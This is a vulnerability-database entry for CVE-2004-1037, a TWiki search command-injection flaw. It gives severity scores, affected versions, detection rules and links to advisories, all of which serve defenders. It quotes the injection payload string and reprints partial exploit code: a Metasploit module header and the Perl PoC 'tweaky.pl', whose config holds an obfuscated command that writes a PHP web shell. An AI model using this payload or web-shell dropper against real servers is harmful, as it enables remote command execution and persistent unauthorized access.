CVE-2004-1037
published 2005-03-01CVE-2004-1037: The search function in TWiki 20030201 allows remote attackers to execute arbitrary commands via shell metacharacters in a search string.
PriorityP261critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
61.67%
99.1th percentile
The search function in TWiki 20030201 allows remote attackers to execute arbitrary commands via shell metacharacters in a search string.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| twiki | twiki | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandscope=text&order=modified&search=nonexistantttt\' ; (<COMMAND>) | sed 's/\(.*\)/AAAA\1BBBB.txt/' ; fgrep -i -l -- 'nonexistantttt↗
- →Detect shell metacharacter injection in the 'search' HTTP parameter sent to TWiki's search/WebSearch CGI endpoint. Look for characters such as single quotes, semicolons, backticks, and pipe symbols in the search parameter value. ↗
- →Monitor HTTP GET and POST requests to paths matching /cgi-bin/twiki/search/ or /twiki/bin/view/Main/WebSearch with a 'search' parameter containing shell injection patterns (e.g., ${IFS}, semicolons, single quotes followed by shell commands). ↗
- →Alert on HTTP requests to TWiki search endpoints where the search parameter contains the pattern: single-quote followed by semicolon and shell command tokens, characteristic of the pre/post string injection wrapper used by the public PoC exploit. ↗
- →Detect use of ${IFS} shell variable substitution in HTTP query parameters targeting TWiki, as used by the Metasploit module to bypass space-character filtering in the search parameter. ↗
- →Flag requests with User-Agent 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)' combined with shell metacharacters in the search parameter, as this is the default UA hardcoded in the public PoC exploit tool 'tweaky.pl'. ↗
- →Affected TWiki versions to target for patching/detection scope: 20040901, 20030201, 20011201, 20001201, and SVN revisions up to and including 3224. ↗
- ·The Metasploit module targets the '/view/Main/WebSearch' endpoint under the configured URI base, while the standalone PoC (tweaky.pl) defaults to '/cgi-bin/twiki/search/Main/'. Defenders should monitor both path patterns as TWiki installations may vary. ↗
- ·The exploit supports both GET and POST HTTP methods for delivering the malicious search parameter; detection rules must cover both request methods. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
TWiki - Search Function Arbitrary Command Execution (Metasploit)
exploitdb·2010-07-03
CVE-2004-1037 TWiki - Search Function Arbitrary Command Execution (Metasploit)
TWiki - Search Function Arbitrary Command Execution (Metasploit)
---
##
# $Id: twiki_search.rb 9671 2010-07-03 06:21:31Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'TWiki Search Function Arbitrary Command Execution',
'Description' => %q{
This module exploits a vulnerability in the search component of TWiki.
By passing a 'search' parameter containing shell metacharacters to the
'WebSearch' script, an attacker can execute arbitrary OS commands.
},
'Author' =>
[
# Unknown - original discovery
'jduck' # metasploit version
],
'Licens
Exploit-DB
TWiki 20030201 - 'search.pm' Remote Command Execution
exploitdb·2004-11-20
CVE-2004-1037 TWiki 20030201 - 'search.pm' Remote Command Execution
TWiki 20030201 - 'search.pm' Remote Command Execution
---
#!/usr/bin/perl
# "tweaky.pl" v. 1.0 beta 2
#
# Proof of concept for TWiki vulnerability. Remote code execution
# Vuln discovered, researched and exploited by RoMaNSoFt
#
# Madrid, 30.Sep.2004.
require LWP::UserAgent;
use Getopt::Long;
### Default config
$host = '';
$path = '/cgi-bin/twiki/search/Main/';
$secure = 0;
$get = 0;
$post = 0;
$phpshellpath='';
$createphpshell = '(echo `perl -e \'print chr(60).chr(63)\'` ; echo \'$out = shell_exec($_GET["cmd"].
" 2\'`perl -e \'print chr(62).chr(38)\'`\'1");\' ; echo \'echo "\'`perl -e \'print chr(60)."pre".chr(62)."\\\\
$out".chr(60)."/pre".chr(62)\'`\'";\' ; echo `perl -e \'print chr(63).chr(62)\'`) | tee ';
$logfile = ''; # If empty, logging will be disabled
$prompt = "tweaky\$ ";
Metasploit
TWiki Search Function Arbitrary Command Execution
metasploit
TWiki Search Function Arbitrary Command Execution
TWiki Search Function Arbitrary Command Execution
This module exploits a vulnerability in the search component of TWiki. By passing a 'search' parameter containing shell metacharacters to a 'Search' script, an attacker can execute arbitrary OS commands. Affected versions: - 20040901 - 20030201 - 20011201 - 20001201 - SVN up to and including revision 3224
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/bugtraq/2004-11/0201.htmlhttp://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000918http://marc.info/?l=bugtraq&m=110037207516456&w=2http://security.gentoo.org/glsa/glsa-200411-33.xmlhttp://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithSearchhttp://www.ciac.org/ciac/bulletins/p-039.shtmlhttp://www.securityfocus.com/bid/11674https://exchange.xforce.ibmcloud.com/vulnerabilities/18062http://archives.neohapsis.com/archives/bugtraq/2004-11/0201.htmlhttp://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000918http://marc.info/?l=bugtraq&m=110037207516456&w=2http://security.gentoo.org/glsa/glsa-200411-33.xmlhttp://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithSearchhttp://www.ciac.org/ciac/bulletins/p-039.shtmlhttp://www.securityfocus.com/bid/11674https://exchange.xforce.ibmcloud.com/vulnerabilities/18062
2005-03-01
Published